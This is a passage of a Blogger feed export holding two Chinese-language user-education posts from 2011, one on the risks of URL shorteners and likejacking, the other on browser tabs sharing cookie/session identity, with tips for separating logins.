trace("failed");
} // end else if
stop();
return;
} // end function
}
}
</b></pre></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-66881030747818671332011-04-04T09:43:00.004+08:002011-04-04T09:47:15.616+08:00上網安全之邪惡短網址 (Surfing Secure for URL Shortening Services)先利用 google 搜尋關鍵字:「短網址」,就可以知道何謂短網址。或者<a href="http://zh.wikipedia.org/zh-tw/%E7%B8%AE%E7%95%A5%E7%B6%B2%E5%9D%80%E6%9C%8D%E5%8B%99">查詢維基百科(Wiki)</a>也行。<br />
<br />
常見短網址服務的網域有:<br />
http://tinyurl.com/ <br />
http://0rz.tw/ <br />
http://0rz.com/ <br />
http://ppt.cc/ <br />
http://goo.gl/ <br />
http://bit.ly/ <br />
... ... <a href="http://mashable.com/2008/01/08/url-shortening-services/">其他好多</a>!! 總之我用邪惡短網址稱呼。也許它全然不是壞的,但是幾百個短網址連結,出現一個問題,可能就很頭大;問題是如果要檢查幾百個短網址可能更頭大,你該如何自處呢?點還不點連結?<br />
<span class="fullpost"><br />
短網址在網路上使用越來越廣泛了,就連 google 也加入短網址服務,這類短網址還有很多並沒有在清單中。絕大部分的短網址有個特色,域名很短且域名之後為一串固定長度的英數字組成,<b>對於短網址必須具有基本識別能力。</b>對於網站中出現的短網址也必須加以注意,因為,它很容易被利用,做為隱藏惡意連結或惡意網域之用。<br />
<br />
為了抓個圖,讓網友了解,等了許久這圖終於出現了:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5z9uMs3EwxfovQg9yrbSH3wIswMLNzVIV07W5UFCir8Hm2LfHbfsBpQSCHk23p82COHt7IdV57HeRQZzLyP1PY4yZL1yOadhiZZtx_8F6iibmQWDcWub54cOWxy6tCWk9-XnfPl335Wc/s1600/FB-Likejacking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5z9uMs3EwxfovQg9yrbSH3wIswMLNzVIV07W5UFCir8Hm2LfHbfsBpQSCHk23p82COHt7IdV57HeRQZzLyP1PY4yZL1yOadhiZZtx_8F6iibmQWDcWub54cOWxy6tCWk9-XnfPl335Wc/s320/FB-Likejacking.png" width="480" /></a><br />
這可是相當典型的「<a href="http://en.wikipedia.org/wiki/Likejacking">Likejacking</a>」手法,而且還配合短網址做利用。相關資料可以參考 <a href="http://facebrowser.blogspot.com/2011/03/facebook-spam-beautiful-marika-fruscio.html">這裡</a> 還有 <a href="http://www.facecrooks.com/safety-center/scam-watch/item/1189-warning-the-beautiful-marika-fruscio-shows-her-breasts-on-italian-tv">這裡</a> 。應該很多人已經點擊該連結了吧,問題是都沒感覺有發生過啥問題...XD。FB 現在還是很甜蜜的,再過段時日,就會有一堆垃圾、廣告、行銷的東東,甚至是惡意連結,出現在大家的牆上,沒辦法,別忘了 FB 可是要取代 EMail 的。<br />
<br />
與短網址有異曲同工之妙的,如「OWASP Top 10 for 2010」中,A10: Unvalidated Redirects and Forwards(未驗證的轉址與轉送)。短網址都大辣辣的提供服務了,相較之下,Unvalidated Redirects and Forwards 的問題實在沒啥大不了的。話說回來,把這兩個搭在一起,再做點變形,還蠻好玩的哩,可以更隱密的隱藏惡意連結...@@。<br />
<br />
對於網站上短網址的出現,需加以留意。若出現在即時通訊(MSN, Yahoo Messenger, google talk, skype …等),那就該更加小心。因為,你不知它會連結到哪個網頁上。<br />
<br />
其他 Web 常見攻擊手法或衍生資安問題<br />
<ul><li>網頁掛馬手法</li>
<li>魚叉式網路釣魚</li>
<li>關鍵字查詢利用(SEO Poison)</li>
<li>惡意程式的下載與執行</li>
<li>網路個人資料外洩</li>
<li>金融交易資料外洩</li>
<li>網路交易詐騙</li>
<li>詐騙網站、郵件</li>
<li>偽防毒網站(流氓軟體)</li>
<li>人肉搜尋</li>
<li>社群網站的個資</li>
<li>不當網路留言、不當上傳影音照片</li>
<li>內部機敏資料的外洩</li>
</ul><br />
結論:<br />
對於企業用戶而言,相信也擺脫不了瀏覽器,無論是存取內部網站或外部網頁,端點安全一直都是企業難以建全防護的地方。對於威脅而言,透過惡意網頁的滲透,很多時候也不需要高深的技術,只需要一個完美策劃的劇本,這將在在考驗企業的用戶。如何修正使用者上網觀念成為重要課題,也僅以此篇文章,與 IT 人員在推廣使用者教育訓練上,提供一些參考方向與觀念內容,強化使用者上網的觀念。<br />
<br />
完整文章亦投稿於「<a href="http://www.isecutech.com.tw/">資安人雜誌</a>,2010. Jan/Feb. No.73,你的上網行為安全嗎?」<br />
本文也張貼於「<a href="http://mysecure.blogspot.com/2011/04/surfing-secure-for-url-shortening.html">資安之我見</a>」。<br />
</span>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-1441759431140700676.post-47037583884582184802011-03-14T12:15:00.001+08:002011-03-14T12:16:00.448+08:00上網安全之Cookie/Session (Surfing Secure for Cookie/Session)Cookie/Session 不注意,無法確保網路身份遭到冒用或濫用。<br />
<br />
<b>這個議題很嚴重,但卻沒人注意問題的嚴重性。</b>目前主流的瀏覽器都有所謂「Tab」功能,IE 稱為「索引標籤」、Chrome & FireFox稱為「分頁」、Safari還用到兩個名稱「索引標籤」與「標籤頁」。要特別注意,目前這些新版瀏覽器,只要是同類瀏覽器,不管你開啟幾個視窗或幾個「Tab」,預設來說都會擁有相同的 Cookie/Session 身份,因為對於系統來說,預設它們都處於一個相同的 Process上。這跟早期的瀏覽器運作很不一樣,早期一個瀏覽器視窗會有獨立的 Process,因此,Cookie/Session 身份很容易切割。<br />
<br />
這會帶來甚麼問題呢?看看下圖。如果已經在一個「Tab」登入了 MSN,這時另外一個「Tab」登入 FB 之後,如果點擊了「尋友工具」,會有甚麼結果呢?<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSm4YQGVmh64Ab5b6ZkB7Rkk8Y3727YH5rf2Gq79_YUpFPAfN3ZZ3ndEdOunes9UnYJuEfZrzm_rD_3WKBJBfRBdaXe5CEw7_AGPVY5rvun_8gD4OYRkeFG-ebtuIhfzmdfE285tx2Igs/s1600/P-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSm4YQGVmh64Ab5b6ZkB7Rkk8Y3727YH5rf2Gq79_YUpFPAfN3ZZ3ndEdOunes9UnYJuEfZrzm_rD_3WKBJBfRBdaXe5CEw7_AGPVY5rvun_8gD4OYRkeFG-ebtuIhfzmdfE285tx2Igs/s400/P-6.png" width="289" /></a></div><span class="fullpost"><br />
答案是:FB 會自動到把 MSN 的好友清單,匯出到 FB 的邀請朋友清單中,進行邀請朋友的動作,過程中並不需要輸入 MSN 的帳號密碼。<b>問題就來了,你知道你目前正以哪一個身份瀏覽該網站嗎?</b>這也是網友該了解的一個基本觀念,否則,無法確保身份遭到冒用或濫用。<br />
<br />
如果要在同一瀏覽器下切割「視窗」或「Tab」使用不同身份,可以 google 搜尋關鍵字:「多重帳號同時登入」,可以找到一些方法,已經有很多網友提供意見,其中最方便使用的是 FireFox 的 CookiePie 套件,可以用「Tab」來切割,這點很重要,因為其它很多類似的 Cookie 管理工具並沒有「Tab」的概念存在;其他比較簡單的是 IE,只需在啟動捷徑上加入參數"-nomerge",這樣Cookie/Session 身份可以限制在「同一個 IE視窗」。<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTGBhgasU3k9c8GR7Nb2azIXy5AtPIH7OBzcEfmndJCQNPuJwEkwT-OnyVhx3eCJOH9YZgel9MJm0PhdbDpLkdgI4FVyIj621xCXEexvN_layofO8VLJ-XpVUugZm5BzzzcqLto_m_sLY/s1600/P-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTGBhgasU3k9c8GR7Nb2azIXy5AtPIH7OBzcEfmndJCQNPuJwEkwT-OnyVhx3eCJOH9YZgel9MJm0PhdbDpLkdgI4FVyIj621xCXEexvN_layofO8VLJ-XpVUugZm5BzzzcqLto_m_sLY/s400/P-7.png" width="315" /></a></div><br />
最簡單的方式,就是不改預設狀況下,使用不同瀏覽器來切割,但我相信這方式應該無法滿足絕大多數的網友。現今來說,瀏覽器一開,登入五、六個帳號以上大概是基本動作了,而這兩年社群網站的興起,更增加許多網站的彼此互動性,如「推」、「讚」、「噗」、「分享」…等,如下圖,這些動作都與 Cookie/Session 身份有莫大的關係。當然,大部分的網站是不會惡意利用,但,遇到釣魚網站或惡意網站,可能結果就不會如網友預期的結果。<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNemqssRLRj5rFdZBpFx0_8UeYPeuPMbPM_5bpfVQZPQ3I6uyRECFnpD47RMp7kfn6wxBG-frHk0PD8ukty9gdsN-WWFW83Hp-Z-f8w39DTyjVEw3fbN2Oh6sfe3dW939dY1I_vZx0hLw/s1600/P-8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNemqssRLRj5rFdZBpFx0_8UeYPeuPMbPM_5bpfVQZPQ3I6uyRECFnpD47RMp7kfn6wxBG-frHk0PD8ukty9gdsN-WWFW83Hp-Z-f8w39DTyjVEw3fbN2Oh6sfe3dW939dY1I_vZx0hLw/s320/P-8.png" width="163" /></a></div><br />
之前也有針對臉書的攻擊行動,可參考「<a href="http://mysecure.blogspot.com/2010/06/facebook-clickjacking.html">Facebook 出現點閱綁架(Clickjacking)之攻擊手法分析</a>」一文,其中攻擊過程就有使用到跨視窗 Cookie/Session 的。國外稱此為「Likejacking」攻擊手法。<br />
<br />
最近,很多網站流行要按「讚」才看得到文章的網站。臉書上也有人發起「<a href="https://www.facebook.com/event.php?eid=206593936021300">要按讚才能觀看嗎?拒絕強迫按讚</a>」的活動,這類都是一種身份濫用的狀況,利用<b>你的身份來推銷文章</b>,很多時候這些文章一點意義也沒有...XD。預期未來這類狀況會越來越嚴重。 <br />
<br />
另外,分享對 FireFox 之 CookiePie 套件使用經驗,此套件在部分網站上會導致驗證不過的問題,或導致一些瀏覽瑕疵。所以我倒過來使用的,也就是說看到 CookiePie 運作下時,該瀏覽過程是沒有 Cookie/Session 身份在瀏覽器的「Tab」中,如下圖,先開啟空白的「Tab」,再開啟CookiePie 運作,使該「Tab」沒有 Cookie/Session 身份在其中,在此進行一般上網瀏覽的行為。<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVIvxv970pipspLEI2HyM07PzNL0sUS2O3qV5DyMrw3tt5GQ2qCsN2zTkpKuf-KMhj0AVcg99FTLEfpN2-FgGZnVd6cexaVMwvrFS5JEpT-rZm3yVfcQg75POyDCWcVpdxeB8cp6htPjg/s1600/P-9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVIvxv970pipspLEI2HyM07PzNL0sUS2O3qV5DyMrw3tt5GQ2qCsN2zTkpKuf-KMhj0AVcg99FTLEfpN2-FgGZnVd6cexaVMwvrFS5JEpT-rZm3yVfcQg75POyDCWcVpdxeB8cp6htPjg/s400/P-9.png" width="400" /></a></div><br />
完整文章亦投稿於「<a href="http://www.isecutech.com.tw/">資安人雜誌</a>,2010. Jan/Feb. No.73,你的上網行為安全嗎?」。<br />
本文也張貼於「<a href="http://mysecure.blogspot.com/2011/03/surfing-secure-for-cookiesession.html">資安之我見</a>」。<br />
</span>Unknownnoreply@blogger.com0